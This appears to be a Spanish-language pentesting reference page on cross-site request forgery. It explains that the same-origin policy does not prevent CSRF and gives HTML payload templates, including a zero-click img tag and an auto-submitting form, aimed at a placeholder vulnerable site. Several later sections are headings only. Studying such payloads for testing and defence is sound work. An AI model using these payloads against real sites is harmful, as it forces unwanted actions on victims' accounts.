Cross-site request forgery (CSRF)

Same-origin policy (SOP) no permitirá que un atacante obtenga la respuesta del servidor a una solicitud maliciosa realizada desde otro origen, pero no previene la realización de peticiones desde otros orígenes. Esto significa que same-origin policy (SOP) no puede considerarse un mecanismo de seguridad contra ataques de cross-site request forgery (CSRF).

HTML GET con interacción de usuario

<a href="http://web-vulnerable.com/?param=CSRF">Haz clic aquí</a>

HTML GET sin interacción de usuario

<img src="http://web-vulnerable.com/?param=CSRF">

Formulario HTML GET con interacción de usuario

<form action="http://web-vulnerable.com" method="GET">
 <input name="param" type="hidden" value="CSRF" />
 <input type="submit" value="Haz clic aquí" />
</form>

Formulario HTML GET sin interacción de usuario

csrf-html-get.html
<html>
  <body onload="document.forms['csrf'].submit()">
   <form action="http://web-vulnerable.com" method="GET" name="csrf">
    <input name="param" type="hidden" value="CSRF" />
    <input type="submit" value="Haz clic aquí" />
   </form>
 </body>
</html>   

Formulario HTML POST con interacción de usuario

Formulario HTML POST sin interacción de usuario

Una solicitud

Múltiples solicitudes

JavaScript fetch POST sin interacción de usuario

Alojar y servir página maliciosa.

Víctima visita página maliciosa.

Eludir tokens CSRF mediante configuraciones incorrectas de CORS

Última actualización

¿Te fue útil?